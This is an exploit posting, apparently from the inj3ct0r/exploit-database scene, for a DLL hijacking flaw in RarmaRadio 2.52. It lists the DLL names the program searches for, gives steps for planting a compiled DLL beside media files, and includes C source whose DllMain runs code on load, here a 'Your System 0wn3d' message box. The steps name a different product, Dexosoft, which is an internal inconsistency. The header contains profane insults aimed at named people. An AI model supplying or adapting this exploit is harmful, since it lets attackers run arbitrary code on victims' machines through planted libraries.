/* #RarmaRadio DLL Hijacking Exploit #Author : anT!-Tr0J4n #Greetz : Dev-PoinT.com ~ inj3ct0r.com #special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member #Home : www.Dev-PoinT.com $ http://inj3ct0r.com #Software : http://www.raimersoft.com/rarmaradio.aspx #Version : 2.52 Bass 2.4 #Tested on: Windows XP sp3 ------------------------------- Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck you kids ------------------------------- [+] msjet49.dll [+] msjet48.dll [+] msjet47.dll [+] msjet46.dll [+] msjet45.dll [+] msjet44.dll [+] msjet43.dll [+] msjet42.dll [+] msjet41.dll [+] msjter49.dll [+] msjter48.dll [+] msjter47.dll [+] msjter46.dll [+] msjter45.dll [+] msjter44.dll [+] msjter42.dll [+] msjter41.dll =-=-=-=-=-=-=-=-=-=-=-=-=-= [>>] Compile code [>>] Move DLL file to the directory where Dexosoft Virtual syv is installed [>>] check the result --> 0wn33d [+] .m3u [+] .wpl [+] xml */ #include "stdafx.h" void init() { MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }